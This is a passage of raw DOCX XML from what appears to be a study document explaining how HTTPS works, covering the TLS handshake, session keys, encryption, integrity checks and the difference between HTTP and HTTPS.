          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the protocol for transferring data over the web) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the protocols for encrypting and securing the communication). Here's a detailed breakdown of how HTTPS works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B8A7C3" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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1. SSL/TLS Handshake Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72089D4F"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The core of HTTPS security is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS handshake</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which establishes a secure connection between the client (usually a browser) and the server. It ensures that both parties agree on encryption methods and can securely exchange data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87C5C0" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Steps involved in the SSL/TLS handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA3FE0"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tep 1: Client Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52314825"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client (browser) sends a request to the server to start a secure session. This includes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A99021" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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upported SSL/TLS versions (e.g., TLS 1.2, TLS 1.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B0FEA" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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upported cipher suites (encryption algorithms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E5A3F" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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 randomly generated number used for encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028925B7"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tep 2: Server Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627896A6"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lastRenderedPageBreak/>
        <w:t>The server responds to the client with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47384ED9" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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SSL/TLS version and cipher suite that will be used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635C4EE" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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 randomly generated number for encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D0C017" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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The server’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL/TLS certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (containing its public key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E662632"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tep 3: Certificate Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD41EF6"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client checks the server’s certificate to ensure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B49231" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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It is issued by a trusted </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Certificate Authority (CA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75593EEF" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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certificate is valid and not expired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD04E8E" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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certificate matches the domain being accessed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162A7FC"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f the certificate is valid, the client proceeds to the next step. If not, it will show a warning or error message (e.g., "Connection is not secure").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D30E8B"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tep 4: Key Exchange</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1B379"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The client generates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pre-master secret</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a random number) and encrypts it with the server’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>public key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from the SSL certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF317B"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client sends this encrypted pre-master secret to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0809ED5D"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Only the server can decrypt the pre-master secret using its private key, which is known only to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3CCAB"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tep 5: Session Keys Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612FABB0"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Both the client and the server independently generate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the pre-master secret.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA6A9B"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session key is used for symmetric encryption, ensuring faster and more efficient data transfer compared to asymmetric encryption (public/private key pairs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238BD2F"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tep 6: Client Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE9E19"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The client sends a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finished</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> message encrypted with the session key to inform the server that the client has successfully set up a secure session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3FFBE"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tep 7: Server Finished</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363713FC"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The server also sends a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finished</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> message encrypted with the session key to indicate that the server has successfully established the secure session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A067D0A"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Once this handshake process is completed, both the client and the server have the same session key. This session key is used to encrypt and decrypt all data exchanged during the session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F7E84F" w14:textId="77777777" w:rsidR="002A50E3"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32CC9DA">
          <v:rect id="_x0000_i3587" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72980C51" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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2. Encrypted Communication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1D75A9"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fter the SSL/TLS handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B37C682"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All subsequent data transmitted between the client and server is encrypted using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>symmetric encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where both parties use the same key for encryption and decryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C75B92"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data is securely transmitted through the encrypted connection, preventing any third party from reading or modifying the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10AA8F" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Symmetric Encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366C0478"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ES</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Advanced Encryption Standard) is typically used for symmetric encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F4453C"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session key, shared between the client and server, encrypts/decrypts the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E11003C" w14:textId="77777777" w:rsidR="002A50E3"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848A2AF">
          <v:rect id="_x0000_i3588" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42FE26" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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3. Data Integrity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1CD77D"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Message Authentication Codes (MACs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To ensure data integrity, both the client and server use a MAC to verify that the data hasn’t been tampered with during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383AE99"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f the data is altered or corrupted during transmission, the MAC verification will fail, and the connection will be terminated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE1BC5" w14:textId="77777777" w:rsidR="002A50E3"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5960265">
          <v:rect id="_x0000_i3589" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="070C1588" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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4. Session Termination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2C863"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When the session is finished:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE70D6"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Either the client or the server can send a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"close_notify"</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> alert to indicate the end of the communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B6063"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connection is then closed, and any session keys are discarded to ensure that no data can be decrypted after the session ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D9AF7" w14:textId="77777777" w:rsidR="002A50E3"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6E6A90B">
          <v:rect id="_x0000_i3590" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EFBB4" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Key Components of HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DAF98A"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SL/TLS Certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server’s public key is part of a digital certificate issued by a trusted Certificate Authority (CA). The certificate includes the public key and details about the server’s identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A3F21C"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rivate Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The server keeps a private key that corresponds to the public key in the certificate. This private key is used to decrypt the pre-master secret sent by the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BE0E3"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lastRenderedPageBreak/>
        <w:t>Session Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The symmetric encryption key generated during the handshake that is used to encrypt and decrypt the data between the client and server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F073B" w14:textId="77777777" w:rsidR="002A50E3"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9EFE85B">
          <v:rect id="_x0000_i3591" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005470F" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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Summary of HTTPS Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1584087B"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lient Hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Client requests a secure connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05461E3E"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erver Hello</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Server responds with certificate and encryption parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02F5E8"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ertificate Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Client validates the server’s certificate to ensure trustworthiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A0A6C4"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Key Exchange</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Client and server exchange encryption keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682A6CD1"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ession Key Creation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Both generate the same session key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D6FEF"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Data Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All data exchanged is encrypted using the session key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DC04C8"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Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Both client and server ensure that the data is not altered during transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB04824"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onnection Close</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The session is terminated securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC84F6"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By using this process, HTTPS provides confidentiality (encryption), integrity (data integrity), and authentication (verifying the identity of the server). This is why HTTPS is crucial for ensuring secure communication on the web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F8747" w14:textId="01AADA03" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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0BE8EBCD">
          <v:rect id="_x0000_i3592" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AF551" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00CE4B95" w:rsidRDefault="002A50E3" w:rsidP="002A50E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="888" w:name="_Toc196308368"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between http and https?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="888"/>
    </w:p>
    <w:p w14:paraId="5DE18B0E" w14:textId="73B4A8A4" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E3" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Here’s a clear difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A08C60" w14:textId="77777777" w:rsidR="002A50E3" w:rsidRPr="00617E2C" w:rsidRDefault="002A50E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1. Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A36151F"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HTTP (Hypertext Transfer Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D4FC5D"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Not secure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Data transmitted via HTTP is sent in plain text, which means it can be intercepted or tampered with by third parties (e.g., hackers, ISPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E234CF"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HTTPS (Hypertext Transfer Protocol Secure)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7110A570"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ecure</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. HTTPS uses SSL/TLS encryption to secure data transfer. It encrypts the data between the client (browser) and server, preventing eavesdropping and tampering by third parties.</w:t>
